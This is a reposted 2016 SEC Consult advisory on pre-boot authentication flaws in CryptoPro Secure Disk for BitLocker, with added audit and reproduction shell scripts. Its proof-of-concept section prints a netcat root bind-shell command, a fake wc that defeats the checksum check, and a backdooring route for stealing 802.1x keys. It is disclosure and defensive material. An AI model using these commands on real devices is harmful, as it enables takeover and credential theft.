CryptWare CryptoPro Secure Disk For Bitlocker 5.1.0.6474 Manipulation

Reported 31 Aug 2016 by Rene Freingruber. Source: packetstorm (packetstormsecurity.com)

CryptWare CryptoPro Secure Disk For Bitlocker 5.1.0.6474 Manipulation - Pre-boot authentication manipulation discovered

SEC Consult Vulnerability Lab Security Advisory < 20160831-0 >
=======================================================================  
title: Manipulation of pre-boot authentication  
product: CryptWare CryptoPro Secure Disk for Bitlocker  
vulnerable version: 5.1.0.6474  
fixed version: 5.2.1  
CVE number: -  
impact: critical  
homepage: http://www.cryptware.eu  
found: 2016-06-30  
by: R. Freingruber (Office Vienna)  
M. von Dach (Office Zurich)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Montreal - Moscow  
Singapore - Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"CryptoPro Secure Disk for BitLocker enhances the functionality of
Microsoft BitLocker to have its own PreBoot Authentication (PBA)
and enables BitLocker to use established and existing authentication
methods like UID/Password and Smartcard/PIN. The encryption
of the hard disk, as well as the recovery mechanism, are realized with
Microsoft BitLocker, while the user authentication and help-desk
mechanism are handled by CryptoPro Secure Disk for Bitlocker.

This ideal combination of both technologies allows customers to
establish an easy-to-use and cost-effective solution, even without
having to use TPM authentication and administration. Our centralized
encryption management with different roles of administration and
multi-client capability delivers new opportunities for customers and
third party service providers."
  
Source:  
http://files.cryptware.eu/200000369-9fec6a1e00/CryptWare_Datenblatt_Secure_Disk_for_BitLocker_EN.pdf  
  
  
Business recommendation:
------------------------
Using the vulnerabilities documented in this advisory, an attacker with
physical access to a device can tamper with the boot process and backdoor
the system to steal login credentials, the private 802.1x certificate and
the associated password.

SEC Consult recommends not using this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Terminal access not blocked at login mask
Installing CryptoPro Secure Disk adds an additional partition (ext3) to the
system. This partition contains a small Linux operating system that is
started directly after the system boots, before any BitLocker code is
executed. An init script then starts the login application.
An attacker can use a keyboard shortcut to switch to the first virtual
terminal. This yields an invisible root shell: commands are executed, but
their output is not directly visible.
The other terminals (terminal two to six) are blocked by entries in the
/etc/inittab file. The corresponding entry for terminal one is commented
out and therefore not active, which is why terminal one remains reachable.
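The inittab situation described above can be checked with a small audit of the consoles an inittab actually claims. The following is an added example, not code from the advisory or from CryptWare: the sample inittab, its entry format and the getty command are constructed assumptions that mirror the description (active entries for consoles two to six, the entry for console one commented out), since the advisory does not show the product's real file.

```shell
#!/bin/sh
# Added example, not from the advisory or the product: audit a sysvinit-style
# /etc/inittab for virtual consoles (tty1..tty6) that no active entry claims.
# The sample inittab is constructed to mirror the situation described above:
# consoles two to six have an active entry, the entry for console one is
# commented out, so Ctrl+Alt+F1 falls through to an unguarded console.
# Entry format and the getty command are assumptions, not the product's files.

SAMPLE_INITTAB='id:3:initdefault:
si::sysinit:/etc/init.d/rcS
# 1:2345:respawn:/sbin/getty 38400 tty1
2:2345:respawn:/sbin/getty 38400 tty2
3:2345:respawn:/sbin/getty 38400 tty3
4:2345:respawn:/sbin/getty 38400 tty4
5:2345:respawn:/sbin/getty 38400 tty5
6:2345:respawn:/sbin/getty 38400 tty6'

# write_sample_inittab: store the constructed sample in a temp file, print its path.
write_sample_inittab() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_INITTAB" > "$f"
    echo "$f"
}

# unguarded_consoles FILE: print every ttyN (1..6) that is not referenced by
# an uncommented inittab entry. init ignores lines starting with '#', so a
# commented-out entry leaves that console with no guarding process at all.
unguarded_consoles() {
    active=$(grep -v '^[[:space:]]*#' "$1")
    for n in 1 2 3 4 5 6; do
        if ! printf '%s\n' "$active" | grep -Eq "(^|[^0-9])tty$n([^0-9]|$)"; then
            echo "tty$n"
        fi
    done
}

f=$(write_sample_inittab)
unguarded_consoles "$f"   # prints: tty1
rm -f "$f"
```

The audit only reports consoles that no active entry references; what the product's blocking entries look like is not shown in the advisory, so on a real image the pattern in `unguarded_consoles` may need to be adapted to the process names actually used there.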
  
  
2) Inadequate software manipulation verification
After the system has started, the following application is launched:
/usr/SUPERSHEEP/bin/app_launcher -a ./ss_gui
app_launcher carries out a number of checks and finally starts the
graphical user interface with the login mask (ss_gui).
These checks first verify the hash sum of the file
/usr/SUPERSHEEP/bin/verify_checksums.sh
and then execute that script. The script calculates the hash sums of nearly
all files on the system and compares them with a preconfigured list, which
is stored inside an encrypted block special file.
If the hash of the script is wrong, or the script reports invalid hashes,
the boot process is stopped and an error is displayed to the user.
The script contains a design/logic error that allows an attacker to bypass
the hash verification. By exploiting this flaw an attacker can modify all
files on the system (e.g. to add a backdoor). Note that the checker itself,
app_launcher, verify_checksums.sh and the tools the script calls, lives on
the same partition it is verifying, so every component the verdict depends
on is within reach of an offline attacker.
  
  
Proof of concept:  
-----------------  
1) Terminal access not blocked at login mask
An attacker can use the keyboard shortcut Ctrl+Alt+F1 to open an
invisible root shell. A simple proof of concept is to type the
command "reboot": the system beeps and reboots.
Another proof of concept: the attacker connects the victim system to a
network with a DHCP server so that it obtains an IP address, and then
starts the following command:
/usr/bin/netcat -lvvp 8197 -e /bin/sh

The command must be typed using a German keyboard layout. It binds a
root shell to port 8197; the attacker can then connect to that port to
issue commands and receive their output.
  
  
2) Inadequate software manipulation verification
The script /usr/SUPERSHEEP/bin/verify_checksums.sh executes the following
command to check the hashes of the listed files:
/tmp/sha256sum -c $CS_FILE > $CS_FILE.out
Later the wc (word count) utility is used to count the number of
errors, using the following code:
NUM_FAILED=`wc -l $CS_FILE.error | cut -d " " -f 1`
The script thereby relies on wc not having been modified and on its
output being correct. An attacker, however, can replace wc with a program
that always reports zero lines, i.e. zero errors.
The problem is that verify_checksums.sh does verify the hash sum of the wc
utility, but it already uses that utility to evaluate the result of the
verification. The same holds for cut in the line above: every tool the
verdict passes through has to be trusted before the verdict exists.

For a proof of concept the wc file was replaced with the following content:
#!/bin/sh
echo a0 xa
exit 0

After that, all scripts and binaries on the system can be modified.
For example, the following script shipped with CryptoPro Secure Disk can be
used to backdoor the system so that private keys (802.1x) are saved together
with the associated password:
/usr/SUPERSHEEP/extract_certificates.sh
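The flaw in the verification design (description 2) and the wc replacement from the proof of concept above can be reproduced in a throwaway directory. The following is an added example written for this page, not the product's verify_checksums.sh and not code from the advisory: the fake root file system, the file names, the checksum list and the stub wc are constructed, and the hardened variants are the editor's suggestion for how to count failures without routing the verdict through an unverified on-disk tool.

```shell
#!/bin/sh
# Added example (not part of the SEC Consult advisory or the CryptWare product).
# It rebuilds, in a throwaway directory, the trust-ordering flaw described
# above: a checksum verifier that counts failed entries with `wc`, while `wc`
# is itself one of the files it is supposed to verify. A stub `wc` modelled on
# the advisory's PoC (always reporting zero lines) silences the check. The
# hardened variants derive the verdict from sha256sum's exit status and shell
# builtins only. All paths, file contents and names below are constructed.

# Build a fake root: two "system" files, a checksum list made while they were
# still pristine, then a tampered file and an attacker-supplied wc stub.
setup_fixture() {
    fix=$(mktemp -d)
    mkdir -p "$fix/bin" "$fix/sys"
    printf 'login mask\n' > "$fix/sys/ss_gui"
    printf 'original\n'   > "$fix/sys/extract_certificates.sh"
    ( cd "$fix/sys" && sha256sum ss_gui extract_certificates.sh ) > "$fix/cs.list"
    # Offline tampering after the list was generated ...
    printf 'backdoored\n' > "$fix/sys/extract_certificates.sh"
    # ... plus a wc that always claims "0 lines", as in the advisory's PoC.
    printf '#!/bin/sh\necho 0 x\nexit 0\n' > "$fix/bin/wc"
    chmod +x "$fix/bin/wc"
    echo "$fix"
}

# Vulnerable pattern (mirrors the advisory's verify_checksums.sh): the
# sha256sum report is filtered into an .error file and its lines are counted
# with wc, resolved through a PATH the attacker has already tampered with.
vulnerable_count() {
    cs="$1/cs.list"
    ( cd "$1/sys" && sha256sum -c "$cs" 2>/dev/null ) > "$cs.out" || true
    grep -v ': OK$' "$cs.out" > "$cs.error" || true
    (
        PATH="$1/bin:$PATH"; hash -r 2>/dev/null   # attacker's wc wins the lookup
        NUM_FAILED=`wc -l "$cs.error" | cut -d " " -f 1`
        echo "$NUM_FAILED"
    )
}

# Hardened tally: the per-file verdict is read with the shell's own `read` and
# `case`, so no on-disk counting tool stands between the verifier and the result.
hardened_count() {
    cs="$1/cs.list"
    n=0
    ( cd "$1/sys" && sha256sum -c "$cs" 2>/dev/null ) > "$cs.out" || true
    while IFS= read -r line; do
        case "$line" in
            *': OK') ;;
            *)       n=$((n + 1)) ;;
        esac
    done < "$cs.out"
    echo "$n"
}

# Simplest form: let sha256sum -c --status speak through its exit code alone.
# Returns non-zero if any listed file mismatches, even with the rogue PATH.
hardened_verify() {
    ( cd "$1/sys" && PATH="$1/bin:$PATH" sha256sum -c --status "$1/cs.list" 2>/dev/null )
}

fix=$(setup_fixture)
echo "vulnerable NUM_FAILED: $(vulnerable_count "$fix")"   # 0 (stub wc)
echo "hardened count:        $(hardened_count "$fix")"     # 1
hardened_verify "$fix" && echo "verify: OK" || echo "verify: FAILED"  # FAILED
rm -rf "$fix"
```

The hardened functions narrow the trusted set to the shell and sha256sum, which is the most a script on the partition can do; they do not remove the structural problem that both of those binaries, and the script itself, sit on the same attacker-writable partition. Closing that gap needs an anchor outside the partition (for instance measured boot with a TPM, which the vendor text above advertises as unnecessary), not a better counting routine.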
  
  
Vulnerable / tested versions:  
-----------------------------  
The version 5.1.0.6474 was found to be vulnerable which was the latest version  
at the time of discovery.  
  
  
Vendor contact timeline:  
------------------------  
2016-08-01: Contacting vendor through [email protected]  
2016-08-02: CryptWare was able to reproduce the vulnerabilities  
2016-08-10: Release of CryptoPro Secure Disk 5.2.1 which  
according to the vendor fixes the vulnerabilities.  
2016-08-31: Coordinated release of security advisory  
  
  
Solution:  
---------  
Upgrade to CryptoPro Secure Disk 5.2.1. The patch is provided  
by the vendor directly.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF R. Freingruber / @2016  
  
Vulners AI Score: 7.4 (High risk)